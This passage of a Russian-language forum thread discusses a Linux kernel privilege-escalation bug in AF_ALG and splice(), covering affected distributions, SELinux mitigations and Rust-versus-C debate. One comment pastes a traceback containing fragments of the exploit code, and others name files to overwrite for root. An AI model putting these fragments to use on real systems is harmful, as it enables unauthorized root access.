Только не смотрите, кто разрабатывал сети. Да и много чего ещё
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68 Ответы: #169, #180

132. Сообщение от Аноним (126), 30-Апр-26, 17:21	+/–
Возможно базы общие.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #114

134. Сообщение от Аноним (134), 30-Апр-26, 17:31	+/–
До взлома Playstation 5, два дня
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #137

135. Сообщение от Аноним (-), 30-Апр-26, 17:33	+4 +/–
пожалуйста, отпишись сюда, когда проверишь
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #125

137. Сообщение от Аноним (153), 30-Апр-26, 17:37	+/–
https://opennet.ru/64938-playstation
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #134

138. Сообщение от Tron is Whistling (?), 30-Апр-26, 18:10	+/–
Это splice() сынок.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #96 Ответы: #165

139. Сообщение от Tron is Whistling (?), 30-Апр-26, 18:14	+/–
Ну кстати да.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60

140. Сообщение от Tron is Whistling (?), 30-Апр-26, 18:15	+/–
В /etc из под чрутов правда не всегда можно пробиться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60 Ответы: #175

141. Сообщение от Tron is Whistling (?), 30-Апр-26, 18:17	+/–
/bin/bash тоже вполне вероятная цель, с приличной вероятностью окажется где-то в рутовых кронах
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60 Ответы: #312

142. Сообщение от openssh_user (ok), 30-Апр-26, 18:27	+/–
https://redos.red-soft.ru/support/secure/uyazvimosti-red-os-.../
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62

144. Сообщение от Аноним (126), 30-Апр-26, 18:30	+/–
Debian 12 Bookworm: su запрашивает пароль Debian 13 Trixie: эксплойт работает Забавно что на https://security-tracker.debian.org/tracker/CVE-2026-31431 написано что Debian 12 уязвим.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #244

145. Сообщение от Аноним (145), 30-Апр-26, 18:36	+/–
Альт Рабочая станция 11.1 со всеми апдейтами на этот момент времени -- система уязвима.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #157, #178, #200

146. Сообщение от Анонимусиус (?), 30-Апр-26, 18:37	+1 +/–
А теперь пруфы. Тебя за язык никто не тянул.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70 Ответы: #214

149. Сообщение от Аноним (149), 30-Апр-26, 18:53	+2 +/–
Ага, сборка без того "чего тебе не надо" (ну, ты так думаешь) вылезает именно так. Причём замечательно, что практически всегда в какой-то момент.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #119

150. Сообщение от Аноним (126), 30-Апр-26, 18:54	+1 +/–
А сопровождающий делал просто копипаст и следил за соблюдением церемонии? Горе-оптимизатор предлагает вместо копии ссылку и это не повод присмотреться?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #125 Ответы: #192

152. Сообщение от Аноним (149), 30-Апр-26, 18:55	+/–
А там вдруг семейство принтеров внезапно подкатило.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111

153. Сообщение от Аноним (153), 30-Апр-26, 18:59	+/–
>в Red OS 8 А зачем ей пользоваться ? https://servernews.ru/1124297
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62 Ответы: #176, #324

154. Сообщение от Fareast (ok), 30-Апр-26, 19:01	–3 +/–
это проблема которую озвучил Маск: с появлением норм ии вроде антропик люди не смогут тянуть вопросы безопасности и с этим может справиться только ии. вы спрашивали когда ии станет умнее человека - вот в апреле 2026 этот момент наступил, поздравляю вас)) новый этап наступил, произошла бифуркация и мы живем в новой реальности, вопросы безопасности ии тоже человек не может тянуть, так как он глупее ии
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #156, #159, #164

155. Сообщение от Ананоним (?), 30-Апр-26, 19:04	–3 +/–
И эти люди нам запрещабют пользоваться X11... Вяленый это для безопасности и удобства, говорили они. Ога... А по факту яленый это забор высотой 10 метров для программы, и она постоянно лазит через него. А рядом дыры типа этой. Но туда низя, это только для очень уваж... специальных применений.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #167

156. Сообщение от Ананоним (?), 30-Апр-26, 19:07	+1 +/–
Человек может тянуть и это и многое другое. Но не все программисты на такое способны. Разгильдяев развелось мама не горюй.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #154 Ответы: #158, #223

157. Сообщение от Аноним (153), 30-Апр-26, 19:13	+1 +/–
Ставьте Ubuntu/Fedora/openSUSE/Oracle Linux
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #145

158. Сообщение от Аноним (153), 30-Апр-26, 19:16	+/–
https://opennet.ru/64574-bug
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #156

159. Сообщение от Аноним (126), 30-Апр-26, 19:21	+/–
Выход есть, но я его здесь не скажу.)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #154

160. Сообщение от Аноним (-), 30-Апр-26, 19:26	+1 +/–
А Васян отключил обновления, потому что он "сам с усам". Впрочем, он и антивирус из системы выпилил, скорее всего.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #105

161. Сообщение от Аноним (-), 30-Апр-26, 19:27	+/–
В программировании, похоже, всё наоборот.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #83 Ответы: #234

163. Сообщение от morphe (?), 30-Апр-26, 19:35	–2 +/–
Вот только тут эта логическая ошибка не выглядела бы на Rust так же Прилетает 2 буфера одного размера, логическая ошибка в том что забыли убедиться что это не один и тот же буфер Тем временем в Rust у тебя strict noalias везде (считай кругом сишный restrict на указателях), а значит тебя бы при разборе аргументов заставило задуматься о подобном, да и санитайзеры бы могли поймать если бы знали что эти буферы не должны алиаситься
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118 Ответы: #197

164. Сообщение от Аноним (164), 30-Апр-26, 19:38	+1 +/–
>вы спрашивали когда ии станет умнее человека - вот в апреле 2026 этот момент наступил, поздравляю вас)) Нет не наступил https://habr.com/ru/companies/pvs-studio/articles/1012756/ >вопросы безопасности ии тоже человек не может тянуть, так как он глупее ии Говорите за себя.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #154 Ответы: #249

165. Сообщение от morphe (?), 30-Апр-26, 19:41	–1 +/–
Тут проблема в том что 2 указателя которые не должны алиаситься алиасятся Rust требует чтобы на одни и те же данные была либо одна изменяемая ссылка, либо сколько угодно неизменяемых Соответственно код разбора аргументов бы должен был проверить аргументы на потенциальный алиасинг, и до копирования бы просто не дошло
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #138 Ответы: #166, #171, #189

166. Сообщение от morphe (?), 30-Апр-26, 19:42	–1 +/–
В сях у тебя все гарантии неявные - пришли 2 указателя и ты думаешь что их наверняка кто-то до тебя проверил В то время как в Rust если тебе пришли 2 указателя то ты знаешь что у тебя никаких гарантий по ним нет, а если 2 ссылки - то ты знаешь что их до тебя уже проверили
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #165 Ответы: #168

167. Сообщение от Аноним (167), 30-Апр-26, 19:45	–1 +/–
Э? Тебе кто запрещает пользоваться Х11, болезненный? У нас тут вообще-то опенсорс, так что ты можешь некрокод себе хоть в зад пихать. Но тявкать и указывать, что должны делать разработчики и мейнтенеры у тебя прав нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #155 Ответы: #172, #276

168. Сообщение от Аноним83 (?), 30-Апр-26, 19:57	+1 +/–
А подпись с печатью от проверяющих стоит? Кто отвественный? Звание?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #166 Ответы: #173

169. Сообщение от Аноним (169), 30-Апр-26, 20:13	–1 +/–
IP,TCP,UDP разработала компания BBN   https://en.wikipedia.org/wiki/RTX_BBN_Technologies
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #128

170. Сообщение от random (??), 30-Апр-26, 20:14	+/–
Если потом, например, сетевая карточка сломается и её нужно будет заменить, то могут возникнуть проблемы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111 Ответы: #210

171. Сообщение от Аноним (169), 30-Апр-26, 20:16	+/–
Тут работа с raw-указателями, а не ссылки.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #165 Ответы: #185

172. Сообщение от Ананоним (?), 30-Апр-26, 20:21	+1 +/–
> Но тявкать и указывать, что должны делать разработчики и мейнтенеры у тебя > прав нет. Тяв! Тяв! Тяв! Как видишь - есть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #167

173. Сообщение от Аноним (-), 30-Апр-26, 20:32	+1 +/–
Виноват, товарищ майор.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #168

175. Сообщение от Аноним (24), 30-Апр-26, 20:34	+/–
да собственно на то и расчет, selinux превращает систему в минное поле, которое будет громко бахать если настроить логирование на удаленну машину с алярмами, а пока админ бежит узнавать что почему, может быть не даст чегото удалить))
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #140 Ответы: #231

176. Сообщение от Аноним (24), 30-Апр-26, 20:40	+/–
на позапрошлой работе я на ней настроил отправку какойто фигни в какоето министерство через https с отечественными ключами, все из каробки, ну типа сьэкономил сколькото тысяч государственных денег, но на самом деле кучу времени, на закладывание в бюджет и блаблабла, и инветоризациях... заодно потыкал палочкой, вполне себе рабочая система, не федора конечно и не центос, но если много не ожидать не разочарует
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #153

177. Сообщение от Аноним (24), 30-Апр-26, 20:47	+5 +/–
а что удивительного, 30 лет писали драйвера, ктото помер уже, а молодой должен прийти и хопа вкурсе где чего как, и все поддерживать и знать при том что большую часть железок в глаза не видел, актуальные драйвера смотрят, сам иногда ковыряю, но смотреть драйвера железки которой у меня нет и не будет, вот зачем бы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39 Ответы: #195

178. Сообщение от Аноним (178), 30-Апр-26, 20:55    Скрыто ботом-модератором	+/–
Не трынди. Даже древние версии не уязвимы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #145

180. Сообщение от kusb (?), 30-Апр-26, 20:57	+/–
Это уже не их код, они разработали протоколы, то есть текст, а реализация уже чья-то другая.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #128

181. Сообщение от Аноним (181), 30-Апр-26, 21:19	+/–
Самое мерзкое, что челики выпускают зеродей эксплоит ради рекламы своего ИИ-сервиса
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #196, #198, #254, #266

184. Сообщение от Аноним (184), 30-Апр-26, 21:37	+/–
А можно как-то вообще отключить весь этот кеш/кеширвание?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #193

185. Сообщение от morphe (?), 30-Апр-26, 21:39	+1 +/–
> Тут работа с raw-указателями, а не ссылки. 1. Уязвимый код как раз в сырых указателях не нуждается, у тебя 2 буфера принадлежащих ядру 2. Даже если допустить что тут нельзя было делать предположения о владельцах буферов, то всё равно ты мог бы обернуть эти указатели в типобезопасные обёртки с гарантиями, а не страдать с void* от недостатков системы типов. Mutability в Rust не обязательно привязана к примитивам
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #171 Ответы: #190, #272

187. Сообщение от Аноним (24), 30-Апр-26, 21:46	–1 +/–
ну, а что нет? это в винде тебе надо кнопочки жать, не читая, далее далее готово, а в линуксе команды вводить, хоть минимальный интелект включать, чего обычно достаточно и всяких, "а вы уверены" не надо. хотя сейчас, собирать пакеты фуфуфу, просто запускаешь скрипт и оно тебе все настроит само, ну может еще чтото куда настроит, тебе же надо быстро, логичный итог
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #91 Ответы: #202, #293

188. Сообщение от Аноним (188), 30-Апр-26, 22:07	+/–
Не надо тут писать что какой-то дистр не подвержен и радоваться. Уязвимость была найдена месяц назад и авторы дали время на исправление. Большинство дистров успели, но некоторые нет. Ну и те кто обновлял ядро более месяца назад тоже уязвим вне зависимости от дистра (хотя маргинальные могли не включать этот модуль, но этих трех землекопов не считаем)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #203

189. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:19	+2 +/–
Всем похер на то, что требует эта поделка. Тут (в splice) идёт работа с материями, которые от хруста находятся примерно на расстоянии нескольких световых лет. Низкоуровневое управление памятью и MMU называется. К сожалению цена ошибки тоже немеряная.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #165

190. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:21	+/–
Там нет блд буферов. Там СТРАНИЦЫ. Которые вообще не известно, чьи в данном случае.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #185 Ответы: #299

191. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:23	+/–
Почему не может? Вполне можно наменять так, что оригинальная функция не пострадает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58 Ответы: #329

192. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:24	+1 +/–
Ты ещё в код сплайса загляни - вот там вообще заглядение со ссылками и копиями.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #150 Ответы: #252

193. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:26	+/–
Нет. Не для бинарей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #184

194. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:27	+3 +/–
Уху. И занимало бы это копирование половину процессорного времени. Ещё раз, речь идёт про механизмы, положенные на splice. Это zerocopy.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #126 Ответы: #251

195. Сообщение от mikhailnov (ok), 30-Апр-26, 22:27	+1 +/–
Еще и порой хотя бы понять, что за железка-то, которая тупо не гуглится
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #177

196. Сообщение от Аноним (196), 30-Апр-26, 22:27	+1 +/–
Да,реально молодцы,представить только,еще в 2017м сделали дыру с планом прорекламировать свой (чей?) ИИ,не иначе провидцы!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #181

197. Сообщение от Tron is Whistling (?), 30-Апр-26, 22:30	+2 +/–
Уже писал: там нет буферов. Прилетают страницы памяти. Которые хрен вообще пойми куда разложены, и которые возможно даже не скопировать без уведомления. Вот то, что за пределы допустимой области писать так огульно не стоило - это да.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #163 Ответы: #232

198. Сообщение от mikhailnov (ok), 30-Апр-26, 22:31	–1 +/–
Да, челики знатно попиарились. Обычно уязвимость делают публично известной через довольно продолжительное время после попадания в stable ядра, а здесь сделали публичной до.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #181

199. Сообщение от Аноним (199), 30-Апр-26, 22:53	+2 +/–
> При этом "множестве глаз" большое кол-во драйверов/подсистем ядра, на сегодняшний день, никем не сопровождаются. Зато какой вой поднимается когда выкидывать начинают из ядра...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

200. Сообщение от Аноним (199), 30-Апр-26, 22:58	+/–
Эти и другие очевидные факты Еще и не пофиксят
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #145

201. Сообщение от Аноним (199), 30-Апр-26, 22:59	+/–
Добро пожаловать. Снова.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #276

202. Сообщение от Аноним (202), 30-Апр-26, 23:44	+/–
Да-да, «выделить» -> СКМ, очень много интеллекта нужно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #187

203. Сообщение от Аноним (35), 30-Апр-26, 23:55	+/–
Это не проблема дистрибутивов, это проблема ядра. Открываем https://kernel.org/ и прокликиваем ядра в поисках коммита >crypto: algif_aead - Revert to operating out-of-place https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 2026-03-31 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 2026-04-11 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 11 hours https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 11 hours https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 11 hours https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 11 hours https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux... 11 hours Фактически, нормальное исправление было только для 7.0. 6.19 помечено как EOL, его пропускаем. Чисто теоретически до выхода 6.18 можно было подготовить эксплоит, но не думаю, что это было легко, так как это требовало автоматизированную систему, способную по заплатке определить наличие уязвимости. И вот, вчера в общий доступ 29-го выходит боевой эксплоит, который может адаптировать по сути любой программист, являющия Zero day для всех ядер с 5.10 по 6.12, а исправление для всех оставшихся ядер выходит только 30-го. А теперь, после выхода исправления требуется какое-то время для того, чтобы запустить обновление пакетов, сборку ядра, запуск тестов(не хорошо будет, если данное ядро не загрузится), и только потом заливку в репозиторий. Прямо сейчас, в некоторых дистрибутивах ядро только на пути к пользователям. Так что времени на обновление не было, был опубликован полноценны zero day.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #188 Ответы: #278, #296

204. Сообщение от Аноним (204), 01-Май-26, 00:05	+/–
> Рассматривание возможность пометки функциональности AF_ALG устаревшей с последующим удалением из ядра в пользу использования криптобиблиотек в пространстве пользователя. Будет ещё один аргумент в пользу микроядер.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #209, #279

205. Сообщение от me (??), 01-Май-26, 00:09	+4 +/–
Linus Torvalds famously, and controversially, referred to the OpenBSD community as a "bunch of masturbating monkeys" in 2008, criticizing their extreme focus on security. He argued they prioritize security to the point where they ignore other crucial aspects of OS development, though he later clarified his disdain for "security sensationalism" rather than the developers themselves
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #206

206. Сообщение от Аноним (35), 01-Май-26, 00:20	+/–
Решил я значит для одного теста поставить OpenBSD в Virtual Box, а установка прерывалась паникой ядра(я не помню, доходил ли процесс до установщика или нет). Я перепроверил контрольные суммы и даже на всякий случай скачал предыдущую версию, но это не помогло. Когда я всё же решил посмотреть, чем вызвана паника, то с удивлением выяснил, что причина была в том, что я дал виртуалке два ядра, и если снизить количество ядер до одного(емнип нужно ещё smt в настройках виртуалки отключить), то установка успешно проходит. Проблема общеизвестна. В следующий раз надо будет начать с NetBSD, и только в том случае, если она не подойдёт, переходить к OpenBSD. Что мешало вместо паники написать человекочитаемое сообщение - мне непонятно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #205 Ответы: #219, #221, #245

207. Сообщение от Аноним (35), 01-Май-26, 00:29	+/–
>Нужно просто не запускать все процессы с полными правами, а явно давать им только те права, которые им нужны для выполнения их задачи. Как это поможет против перезаписи glibc? Glibc неизбежно будут использовать все приложения.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55 Ответы: #237

208. Сообщение от Аноним (35), 01-Май-26, 00:34	+/–
Здесь подход заключается в том, что условный браузер запускается в одном домене, сборка первого проекта - во втором, сборка второго проекта - в третьем, а запуск первого проекта - в четвёртом. Таким образом, руткит не доберётся до браузера, а один плохой проект не сможет инфицировать сборочное пространство для второго.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97

209. Сообщение от Аноним (64), 01-Май-26, 01:20	+/–
тсссс, все яйца должны лежать в одной корзине!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #204

210. Сообщение от april (?), 01-Май-26, 01:23	+/–
просто держишь большое ядро в запасе на такие случаи. не каждый день карточки меняются.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #170

211. Сообщение от penetrator (?), 01-Май-26, 01:25	+2 +/–
контейнеры - это горбатый хайп, который появился как потребность деплоить зверинец другого хайпа - микросервисов а безопасна только физически отдельная машина, и то со своими оговорками но пипл хавает и будет хавать дальше, "истина не доступна большинству"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #241

212. Сообщение от penetrator (?), 01-Май-26, 01:36	+/–
и что? я установил у сбея скомпилил статически, притянул готовый бинарник на целевую машину
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

213. Сообщение от Анонимный татарин (?), 01-Май-26, 01:52	+/–
А бармен ему отвечает: шагай отсюда, питонист экзальтированный
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31

214. Сообщение от Аноним (214), 01-Май-26, 01:53	+/–
Да достаточно статистику глянуть. Хотя CVE порой дебильные: там даже есть моя уровня high, которую нереально триггернуть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #146 Ответы: #243

215. Сообщение от Анонимный татарин (?), 01-Май-26, 01:55	+1 +/–
S in Docker stands for Security Вообще, конечно, тот, кто такое говорит, и, тем более, верит, позор отца и всего рода. Но, кажется, это те же мастера пыхи, что щас за раст топят
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

216. Сообщение от Аноним83 (?), 01-Май-26, 02:16	–1 +/–
Фиг знает, мне кажется там без ручного поиска или как минимум отсева не обходится. Мне вот квен 3.5 на 112б такую фигню пишет: However, TP_F_S_MASK is defined as 0x000fu (4 bits). TP_F_EXCLUSIVE is bit 3 (value 8). Issue: If TP_F_EXCLUSIVE is enabled (currently #if 0), the 4th bit (value 8) will be truncated
Ответить | Правка | Наверх | Cообщить модератору

217. Сообщение от Аноним (217), 01-Май-26, 04:02	+/–
можно ли её для рутования Андроида применить?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #235, #239

219. Сообщение от Аноним (77), 01-Май-26, 04:55	–1 +/–
Паника ядра на то и паника, что человекочитаемое сообщение писать уже поздно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #206 Ответы: #280

220. Сообщение от Syndrome (ok), 01-Май-26, 05:04	–2 +/–
Изначально уязвимость заключается в том что ядро предоставляет услуги по шифрованию пользователям. Для коренного решения этой проблемы необходимо перекомпилировать ядро с настройкой «config_crypto_user_api=n». Любая программа которой нужно шифрование должна использовать библиотеку.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #262

221. Сообщение от openssh_user (ok), 01-Май-26, 05:06	+/–
Интересно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #206

222. Сообщение от Аноним (222), 01-Май-26, 05:48	–1 +/–
Потому что ИИшку ещё не научили с дизассемблированными текстами работать. А вот когда научат (а научат точно), вот тогда будет очень весело.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70 Ответы: #250

223. Сообщение от Fareast (ok), 01-Май-26, 06:04	+/–
Сомнительно, Каспаров самый умный шахматист на тот момент проиграл же, тоже самое сейчас случилось, ни в одном человеке нет такого быстродействия, объема загруженных знаний. Ну может конечно 1-2 человека живет на каждом континенте, которые на это способны. Здесь каждый второй говорит что он умнее ии, но это просто бравада
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #156 Ответы: #236, #242

231. Сообщение от Tron is Whistling (?), 01-Май-26, 10:30	+/–
Вот сколько с селинухом сталкиваюсь - бахают в основном приложения... потому что его для мало-мальски сложного приложения точно настроить - это задача не для слабонервных. Хотя, если заняться больше ну вот совсем нечем...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #175

232. Сообщение от Tty4 (?), 01-Май-26, 11:37	+1 +/–
Прилетает прямая ссылка на страницу памяти с полным доступом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #197 Ответы: #301

233. Сообщение от Аноним (233), 01-Май-26, 11:57	+2 +/–
9 лет безопасной эксплуатации это так по открытому. Нонсенс как всегда радует.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #259

234. Сообщение от Аноним (240), 01-Май-26, 12:04	+1 +/–
Вот горе-оптимизатор построил оптимизацию и сломал безопасность.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #161

235. Сообщение от openssh_user (ok), 01-Май-26, 12:19	+/–
>Актуальные версии Android не подвержены атаке из-за ограничения доступа к сокетам AF_ALG при помощи SELinux. Android 9 и 13. Я пытался сделать chroot. Не вышло. Traceback (most recent call last):   File "/storage/emulated/0/test.py", line 9, in <module>     while i<len(e):c(f,i,e[i:i+4]);i+=4                    ~^^^^^^^^^^^^^^   File "/storage/emulated/0/test.py", line 5, in c     a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)   File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__     _socket.socket.__init__(self, family, type, proto, fileno)     ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ PermissionError: [Errno 13] Permission denied
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #217

236. Сообщение от Аноним (236), 01-Май-26, 12:20	+/–
Сходи Панчула почитай. В ответ на его что не может ии всегда набгает куча фанатиков. И прмот не тот, и попробуй новую версию за полгода они сильно выросли, и они точно решат эту задачу а так за вечер напромптили приложений и заработали 2млн$. Там много смешных людей. Но простые вопросы решить не могут. Ты пойди им покажи как надо.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #223

237. Сообщение от Аноним (-), 01-Май-26, 12:36	+/–
Нужно предотвратить перезапись. Максимально уменьшить поверхность атаки, defence in depth. Речь о том, чтобы эксплойт внутри процесса не получил примитивов для атаки на систему. Если у приложения нет доступа к AF_ALG, оно не может вызвать опасный splice() в page cache чужих файлов — и ограничение прав именно это и предотвращает. Например, тот же AOSP: убрать из ядра лишнее (AF_ALG), заменить критичную криптографию на userspace-реализации (Keystore, Titan/StrongBox), и жёстко изолировать каждый процесс (SELinux + seccomp + namespaces).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #207 Ответы: #307

239. Сообщение от Аноним (-), 01-Май-26, 15:53	+/–
В Android userspace API для криптографии ядра обычно отключены (в AOSP уж точно). Но ещё явно запрещено использование AF_ALG через SELinux для почти всех процессов через neverallow. Вроде как, вендорам запрещено убирать эти явные запреты.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #217 Ответы: #261

240. Сообщение от Аноним (240), 01-Май-26, 16:46	+/–
Доступ к splice() контролируется SELinux. Если процесс не имеет соответствующего контекста, то не сработает уязвимость.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

241. Сообщение от Аноним (214), 01-Май-26, 16:49	+/–
Мокросервисы - попытка изобрести IPC из примерно 80-х, причем.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #211

242. Сообщение от Аноним (214), 01-Май-26, 16:57	+/–
Чего в датасете нет, то никакая нейросеть никогда не найдет. Что-то найти или проанализировать по готовым паттернам - тут они хорошо справляются.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #223 Ответы: #248, #253, #268, #274

243. Сообщение от Аноним (243), 01-Май-26, 17:06	+/–
Какую статистику? У нас кто-то уязвимости в вынде искать и исправлять начал? Или под вынду закончились вирусы?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #214

244. Сообщение от Аноним (240), 01-Май-26, 17:48	+/–
>Debian 13 Trixie: эксплойт работает Ядро обновили на 6.12.85+deb13-amd64. На данный момент эксплойт не работает. su запрашивает пароль.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #144

245. Сообщение от Аноним (-), 01-Май-26, 20:40	+/–
VirtualBox криво виртуализирует CPU. Его виртуальные процессоры — это обычные потоки хостовой ОС, и он может выдавать гостю разные флаги CPUID на разных ядрах. OpenBSD при старте SMP жестко проверяет, чтобы все процессоры были идентичны, а увидев расхождение — паникует, потому что для ядра это признак сломанного железа. У Linux есть официальные Guest Additions и масса костылей под популярные гипервизоры. Ядро Linux давно приучено к гетерогенным архитектурам вроде ARM big.LITTLE, где разные ядра реально отличаются возможностями, и включать обходные пути для VirtualBox ему несложно. OpenBSD к такому не приспособлен. https://forums.virtualbox.org/viewtopic.php?p=22654 > ... the product is badly broken > When that VM is running, we end up with bugs that make it quite clear that cpu registers are being corrupted in some instances. > We don't know how other operating system products continue running when the userland ecx register gets clobbered on a return from a page fault, but at least people should be aware that there is likely some security risk from running that product. Это было в 2008 году, но, видимо, особо ничего не поменялось.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #206 Ответы: #246, #247, #297

246. Сообщение от Аноним (-), 01-Май-26, 20:45	+/–
Для Windows есть Hyper-V, VMWare и QEMU. Для Linux есть Xen, KVM, QEMU, VMWare и много чего ещё...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #245

247. Сообщение от Аноним (-), 01-Май-26, 20:46	+/–
Это цитаты Тео, если что... Забыл указать
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #245

248. Сообщение от Аноним (248), 01-Май-26, 22:15	+/–
Проблема в том, что 99% уязвимостей обнаруживаемых в реальном софте уже есть в датасете. Одни и те же паттерны.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #242

249. Сообщение от Аноним (248), 01-Май-26, 22:21	+/–
А к чему эта ссылка? Она не показывает каких-то принципиальных проблем llm. Она показывает, что без ограничений опус версии 4.5 пишет рабочий, но не очень качественный код. Если подключить нормальный системный промпт (тот стиль C++ который нравится автору), линтер и статанализатор, а также накидать корректных архитектурных паттернов результат будет совершенно другой.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #164 Ответы: #275

250. Сообщение от Аноним (251), 01-Май-26, 23:04	+/–
Ветвлений много и зацепиться токенами не за что. То ли дело здесь: увидел splice() и крути всё что знаешь о ней подозрительного. Хотя я могу, конечно, ошибаться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #222

251. Сообщение от Аноним (251), 01-Май-26, 23:21	–1 +/–
В rust данные между потоками передаются копией, передачей владения. Данные переданные владением уже не недоступны передавшему потоку, пока получивший не вернет обратно владение. Ну копия - это для сведения.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #194 Ответы: #260, #308

